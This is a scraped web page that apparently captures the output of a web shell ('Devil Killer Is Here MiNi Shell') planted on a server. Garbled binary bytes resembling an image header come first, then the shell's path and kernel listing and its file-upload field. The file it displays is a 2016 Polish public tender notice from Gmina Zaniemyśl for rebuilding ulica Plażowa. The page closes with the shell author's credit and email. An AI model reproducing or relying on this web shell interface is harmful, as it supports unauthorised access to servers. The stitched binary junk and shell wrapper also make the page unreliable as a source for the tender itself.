JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160628/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160628/108031-N-2016.html

<p class="kh_header"><b>Zaniemyśl: Przebudowa ulicy Plażowej w Zaniemyślu</b><br>
<b>Numer ogłoszenia: 108031 - 2016; data zamieszczenia: 28.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Zaniemyśl , ul. Średzka 9, 63-020 Zaniemyśl, woj. wielkopolskie, tel. 61 2857580, faks 61 2857747.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zaniemysl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ulicy Plażowej w Zaniemyślu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PAKIET I:  
W zakres opracowania wchodzi cały odcinek ulicy Plażowej o długości 436,90mb. Przedmiotem zamówienia jest wykonanie utwardzenia nawierzchni drogi z miejscami  postojowymi z kostki brukowej wraz z wykonaniem kanalizacji deszczowej z włączeniem w istniejącą sieć  

Przepusty pod koroną drogi		
- przepust z rur betonowych średnicy 800mm (rury z odzysku) na ławie z kruszywa łamanego 0/31,5mm grub. 30cm i podsypce z piasku grubości 10cm	- 14,00 mb			  
- ścianki czołowe przepustu prefabrykowane z betonu zbrojonego na ławie betonowej z betonu C-12/15 ,  łącznie z montażem na rury śred. 800mm  (2 szt.)  - umocnienie wlotu i wylotu kamieniem polnym na podsypce cementowo piaskowej na długości 1,00m  (2 m2)  

Kanalizacja deszczowa				  
- wykonanie studzienek ściekowych z gotowych elementów prefabrykowanych lub rur bet. śr. 500mm z osadnikiem i kratą ściekową na zawiasach łącznie z robotami ziemnymi (3 szt)  
- wykonanie przykanalików z włączeniem do istniejących studni rewizyjnych, z rur PVC śred. 200mm z robotami ziemnymi i obsypką piaskową	(44 mb)    

Wykonanie nawierzchni z kostki brukowej betonowej grubości 8 cm na podsypce cementowo piaskowej 1:4 grubości 4cm (na parkingach linie dzielące w kolorze grafitowym)		  
-jezdnia (wraz z podbudową z chudego betonu Rm=6-9MPa gr. 20 cm, przejście dla pieszych w kolorze czerwonym). Razem-2559,00 m2 
-wjazdy, parkingi (wraz z podbudową z chudego betonu Rm=6-9MPa gr.i 15 cm). Razem-1153,30 m2					 

Wykonanie progu zwalniającego  z kostki brukowej bekonowej wraz z oznakowaniem drogowym 
(2 szt.) oraz słupkami ograniczającymi możliwość objazdu progu zwalniającego (2 szt.)

Wykonanie nawierzchni chodnika z kostki brukowej betonowej grubości 6 cm na podsypce cementowo piaskowej 1:4 grubości 5cm				  
- nawierzchnia chodnika z kostki betonowej szarej (75%) i czerwonej (25%) - 179,30 m2				 

Krawężnik betonowy  na podsypce cementowo-piaskowej 1:4 grub. 3cm, i ławie betonowej z oporem, beton C 12/15 z wykonaniem rowka				  
- krawężnik betonowy przejazdowy 15/22	(117,00 mb)			  
- krawężnik betonowy 15/30			(191,50 mb)	  
- opornik betonowy 10/25			(652,80 mb)	 				 

Obrzeże betonowe 6/20 na podsypce cementowo-piaskowej 1:4, 3cm i ławie betonowej z oporem, beton C 12/15  (94,00 mb) 				 

Ściek uliczny przykrawężnikowy  z dwóch rzędów kostki betonowej 10/20/8 na podsypce cementowo-piaskowej 1:4 -205,00 mb (wraz z podbudową z chudego betonu Rm=6-9MPa gr. 20 cm)		  

Wykonanie trawników przez humusowanie ( 5cm) i obsianie trawą (pobocza +środek wyspy)  - 543,75 m2 Renowacja istniejącego rowu poprzez pogłębienie i wyskarpowanie - 150 mb  

Usunięcie drzew i krzewów				  
-karczowanie drzew wraz z wywozem gałęzi i karpiny poza teren robót a dłużyc na plac Inwestora z zasypaniem i zagęszczeniem dołów				  
- średnica pnia 35cm (dąb)				 
- średnica pnia 60cm (topola)				  

Rozbiórka elementów dróg z wywozem, prefabrykaty nieuszkodzone na plac Inwestora, gruz poza teren robót				  
- rozbiórka nawierzchni bitumicznej wraz z podbudową				  
- rozbiórka krawężnika betonowego 20/30 wraz z ławą betonową				  - rozbiórka chodnika z kostki brukowej betonowej grubości 6cm				  - rozbiórka przepustu z rur betonowych średnicy 800mm (rury do ponownego wbudowania) wraz z niezbędnymi robotami ziemnymi. 				  

Oznakowanie poziome cienkowarstwowe, oznakowanie pionowe - montaż znaków.   


PAKIET II:  

1.  Usunięcie kolizji linii napowietrznej nn 0,4kV w m. Zaniemyśl ul. Plażowa dz. 464,  467, 465/16  
-Demontaż istniejącej linii   
-Zmiana sposobu zasilania linii kablowa nn 0,4kV  
-Obsługa geodezyjna  

2. Budowa oświetlenia w m. Zaniemyśl ul. Plażowa dz. 31/2, 31/1, 464, 465/16.  -Montaż szafki oświetleniowej i imprez plenerowych  
-Montaż linii kablowej nn 0,4kV zasilającej słupy oświetleniowe  
-Montaż słupów i opraw oświetleniowych LED 14 sztuk  
-Obsługa geodezyjna  

Dokładny zakres prac zawarty jest w dokumentacji projektowej.  Zamawiający załącza dokumenty dodatkowe jak przedmiary, obejmujące wszystkie roboty do wykonania zgodnie z obowiązującymi normami i najlepszą wiedzą techniczną, kosztorys ofertowy do wypełnienia.   

Rozliczenie za wykonanie przedmiotu zamówienia będzie ryczałtowe.  Zamawiający wymaga minimum 36 miesięcznej gwarancji, jeżeli jednak okres gwarancji podany przez Wykonawcę będzie dłuższy niż 5 lat dla oceny ofert zamawiający przyjmuje okres gwarancji równy 5 lat przyjmując: - 5 lat =5 pkt - 4 lata = 2,5 pkt - 3 lata = 0 pkt Jeśli dwie lub więcej ofert otrzyma taką samą największą liczbę punktów, Zamawiający jako najkorzystniejszą wybierze tę spośród nich, której cena będzie najniższa..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0, 31.52.72.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium.  
Ustala się wadium w zakresie poszczególnych zadań od 1 do n w wysokości: 	
1) dla PAKIETU I w wysokości: 10 000,00 zł, słownie: dziesięć tysięcy   zł. 	
2) dla PAKIETU II w wysokości: 3 000 ,00zł, słownie: trzy tysiące  zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez wykonawcę realizacji co najmniej 2 robót budowlanych okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres 	prowadzenia działalności jest krótszy - w tym okresie. 	Udokumentowanie co najmniej dwóch robót dla każdego z PAKIETÓW - dla PAKIETU I o wartości 450 000,00 zł brutto każda (z zakresu przebudowy nawierzchni dróg) oraz dla PAKIETU II o wartości 140 000,00 zł brutto każda (z zakresu budowy instalacji oświetlenia ulicznego).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - okres gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający, zgodnie z art. 144 PZP , przewiduje zmianę postanowień zawartej umowy 
ryczałtowej w stosunku do treści oferty tylko w przypadku ustawowych zmian np. podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zaniemysl.pl - BIP -Zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.zaniemysl.pl - BIP -Zamówienia publiczne
Gmina Zaniemyśl
ul. Średzka 9
63-020 Zaniemyśl
Pokój nr 104.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.07.2016 godzina 10:00, miejsce: Gmina Zaniemyśl
ul. Średzka 9
63-020 Zaniemyśl
Pokój nr 104.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Gmina Zaniemyśl ubiega się o dofinansowanie zadania w ramach operacji: Budowa lub modernizacja dróg lokalnych w ramach poddziałania Wsparcie inwestycji związanych z tworzeniem, ulepszaniem lub rozbudową wszystkich rodzajów małej infrastruktury, w tym inwestycji w energię odnawialną i w oszczędzanie energii w ramach działania Podstawowe usługi i odnowa wsi na obszarach wiejskich , objętego PROW na lata 2014-2020.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa ulicy Plażowej w Zaniemyślu.
Przedmiotem zamówienia jest wykonanie utwardzenia nawierzchni drogi z miejscami
postojowymi z kostki brukowej wraz z wykonaniem kanalizacji deszczowej z włączeniem w istniejącą
sieć.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przepusty pod koroną drogi
- przepust z rur betonowych średnicy 800mm (rury z odzysku) na ławie z kruszywa łamanego
0/31,5mm grub. 30cm i podsypce z piasku grubości 10cm - 14,00 mb
- ścianki czołowe przepustu prefabrykowane z betonu zbrojonego na ławie betonowej z betonu C-
12/15 , łącznie z montażem na rury śred. 800mm (2 szt.)
- umocnienie wlotu i wylotu kamieniem polnym na podsypce cementowo piaskowej na długości
1,00m (2 m2)
Kanalizacja deszczowa
- wykonanie studzienek ściekowych z gotowych elementów prefabrykowanych lub rur bet. śr.
500mm z osadnikiem i kratą ściekową na zawiasach łącznie z robotami ziemnymi (3 szt)
- wykonanie przykanalików z włączeniem do istniejących studni rewizyjnych, z rur PVC śred. 200mm
z robotami ziemnymi i obsypką piaskową (44 mb)
Wykonanie nawierzchni z kostki brukowej betonowej grubości 8 cm na podsypce cementowo
piaskowej 1:4 grubości 4cm (na parkingach linie dzielące w kolorze grafitowym)
-jezdnia (wraz z podbudową z chudego betonu Rm=6-9MPa gr. 20 cm, przejście dla pieszych w
kolorze czerwonym). Razem-2559,00 m2
-wjazdy, parkingi (wraz z podbudową z chudego betonu Rm=6-9MPa gr.i 15 cm). Razem-1153,30 m2
Wykonanie progu zwalniającego z kostki brukowej bekonowej wraz z oznakowaniem drogowym
(2 szt.) oraz słupkami ograniczającymi możliwość objazdu progu zwalniającego (2 szt.)
Wykonanie nawierzchni chodnika z kostki brukowej betonowej grubości 6 cm na podsypce
cementowo piaskowej 1:4 grubości 5cm
- nawierzchnia chodnika z kostki betonowej szarej (75%) i czerwonej (25%) - 179,30 m2
Krawężnik betonowy na podsypce cementowo-piaskowej 1:4 grub. 3cm, i ławie betonowej z
oporem, beton C 12/15 z wykonaniem rowka
3
- krawężnik betonowy przejazdowy 15/22 (117,00 mb)
- krawężnik betonowy 15/30 (191,50 mb)
- opornik betonowy 10/25 (652,80 mb)
Obrzeże betonowe 6/20 na podsypce cementowo-piaskowej 1:4, 3cm i ławie betonowej z oporem,
beton C 12/15 (94,00 mb)
Ściek uliczny przykrawężnikowy z dwóch rzędów kostki betonowej 10/20/8 na podsypce
cementowo-piaskowej 1:4 -205,00 mb (wraz z podbudową z chudego betonu Rm=6-9MPa gr. 20
cm)
Wykonanie trawników przez humusowanie ( 5cm) i obsianie trawą (pobocza +środek wyspy) - 543,75
m2
Renowacja istniejącego rowu poprzez pogłębienie i wyskarpowanie - 150 mb
Usunięcie drzew i krzewów
-karczowanie drzew wraz z wywozem gałęzi i karpiny poza teren robót a dłużyc na plac Inwestora z
zasypaniem i zagęszczeniem dołów
- średnica pnia 35cm (dąb)
- średnica pnia 60cm (topola)
Rozbiórka elementów dróg z wywozem, prefabrykaty nieuszkodzone na plac Inwestora, gruz poza
teren robót
- rozbiórka nawierzchni bitumicznej wraz z podbudową
- rozbiórka krawężnika betonowego 20/30 wraz z ławą betonową
- rozbiórka chodnika z kostki brukowej betonowej grubości 6cm
- rozbiórka przepustu z rur betonowych średnicy 800mm (rury do ponownego wbudowania) wraz z
niezbędnymi robotami ziemnymi.
Oznakowanie poziome cienkowarstwowe, oznakowanie pionowe - montaż znaków..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przebudowa ulicy Plażowej w Zaniemyślu.
Usunięcie kolizji linii napowietrznej nn 0,4kV w m. Zaniemyśl ul. Plażowa dz. 464, 467, 465/16 oraz
budowa oświetlenia w m. Zaniemyśl ul. Plażowa dz. 31/2, 31/1, 464, 465/16.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Usunięcie kolizji linii napowietrznej nn 0,4kV w m. Zaniemyśl ul. Plażowa dz. 464, 467, 465/16
Demontaż istniejącej linii
Zmiana sposobu zasilania linii kablowa nn 0,4kV
Obsługa geodezyjna
2. Budowa oświetlenia w m. Zaniemyśl ul. Plażowa dz. 31/2, 31/1, 464, 465/16.
Montaż szafki oświetleniowej i imprez plenerowych
Montaż linii kablowej nn 0,4kV zasilającej słupy oświetleniowe
4
Montaż słupów i opraw oświetleniowych LED 14 sztuk
Obsługa geodezyjna.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.52.72.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. okres gwarancji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com